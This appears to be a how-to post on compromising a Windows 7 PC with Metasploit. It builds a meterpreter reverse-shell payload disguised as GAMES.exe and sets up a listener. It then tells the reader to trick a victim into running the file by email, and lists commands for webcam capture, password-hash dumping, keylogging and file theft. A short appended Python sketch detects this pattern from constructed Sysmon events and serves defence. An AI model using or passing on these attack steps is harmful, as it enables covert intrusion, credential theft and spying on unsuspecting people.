Windows 7 Vulnerability Exploited using Metasploit in BACKTRACK
· Boot Backtrack 5 on machine.
· Open command shell, i.e. KONSOLE
· Type msfconsole //OPEN MSFCONSOLE
· msfpayload windows/meterpreter/reverse_tcp set LHOST=192.168.1.4 set LPORT=4444 x> /root/GAMES.exe
· //COMMAND 4 is the payload for the vulnerability.
· //LHOST -> Set local host
· //LPORT -> Set local port
· //CREATE EXE FILE IN ROOT OF BT (X -> executable)
· CHECK FOR THE FILE IN THE ROOT OF BT. THE FILE WILL BE AN EXE FILE.
· THE ABOVE PROCEDURE IS FOR CREATING AN EXE FILE WHICH INCLUDES PAYLOAD FOR EXPLOIT.
· Use exploit/multi/handler //OPEN MULTIHANDLER
· Set PAYLOAD windows/meterpreter/reverse_tcp // SET PAYLOAD
· Set LHOST 192.168.1.4 //SET LOCAL HOST IP
· Set LPORT 4444 //SET LOCAL HOST PORT
· exploit //APPLY THE EXPLOIT AND START THE SERVER
· MEANWHILE, BY MEANS OF SOCIAL ENGINEERING, EMAIL THE GAMES.EXE FILE TO THE VICTIM AND MAKE HIM EXECUTE THE FILE.
· THE BEST WAY IS TO BIND THE FILE AND SEND IT.
· Once the file is executed by the victim, you will be notified that the connection with your computer has been established.
· Now you have the command console of the WIN7 machine on your BT.
· ps //GIVES YOU THE LIST OF PROCESSES RUNNING ON THE VICTIM'S PC
· 2212 EXPLORER.EXE //EXAMPLE OF PROCESS RUNNING
· Migrate 2212 //ATTAINS THE CONTROL OF THE PROCESS 2212 (i.e. EXPLORER.exe)
· webcam //STARTS THE WEBCAM ON OTHER COMP
· webcam_snap //TAKES THE SNAP USING WEBCAM
· hashdump //GET THE HASH VALUES OF THE USER PASSWORD
· Keyscan_start //STARTS THE KEYLOGGER
· keyscan_dump //DISPLAYS THE RECORDED KEYSTROKES
· sysinfo //GIVES YOU SYSTEM INFO.
· getpid //GIVES THE ID OF THE CURRENT PROCESS
· download “filename” //DOWNLOAD A PARTICULAR FILE FROM THE VICTIM'S MACHINE
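
From the defender's side, the steps above leave a recognisable trail on the Windows 7 host: an EXE started from a user-writable folder, an outbound connection from that same process a moment later, and then a thread created in EXPLORER.EXE. The following is an added example, not part of the original post. The events are constructed sample data that use Sysmon field names, and the sketch assumes the migrate step is logged as a CreateRemoteThread event.

```python
from datetime import datetime, timedelta

# Folders a mailed or downloaded EXE is normally started from (assumed list).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\")
WINDOW = timedelta(seconds=60)  # launch-to-connect window (assumed threshold)

# Constructed events: id 1 = ProcessCreate, 3 = NetworkConnect,
# 8 = CreateRemoteThread. Not taken from a real host.
EVENTS = [
    {"id": 1, "time": "2024-01-01 10:00:00", "ProcessId": 3120,
     "Image": r"C:\Users\bob\Downloads\GAMES.exe"},
    {"id": 3, "time": "2024-01-01 10:00:02", "ProcessId": 3120,
     "Image": r"C:\Users\bob\Downloads\GAMES.exe",
     "DestinationIp": "192.168.1.4", "DestinationPort": 4444},
    {"id": 8, "time": "2024-01-01 10:01:30", "SourceProcessId": 3120,
     "SourceImage": r"C:\Users\bob\Downloads\GAMES.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"id": 1, "time": "2024-01-01 10:05:00", "ProcessId": 4000,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "time": "2024-01-01 10:05:01", "ProcessId": 4000,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
]

def ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def detect(events):
    """Return (rule, pid, detail) alerts for processes started from user folders."""
    alerts, started = [], {}
    for ev in sorted(events, key=ts):
        image = ev.get("Image", ev.get("SourceImage", "")).lower()
        if ev["id"] == 1 and any(d in image for d in USER_WRITABLE):
            started[ev["ProcessId"]] = ts(ev)  # remember launch time per PID
        elif ev["id"] == 3 and ev["ProcessId"] in started:
            # Port-agnostic on purpose: LPORT is whatever the sender chose.
            if ts(ev) - started[ev["ProcessId"]] <= WINDOW:
                alerts.append(("outbound-after-launch", ev["ProcessId"],
                               f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'))
        elif ev["id"] == 8 and ev["SourceProcessId"] in started:
            alerts.append(("remote-thread", ev["SourceProcessId"],
                           ev["TargetImage"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Keying the rule on where the EXE was launched from, rather than on port 4444, keeps it useful when a different LPORT is chosen.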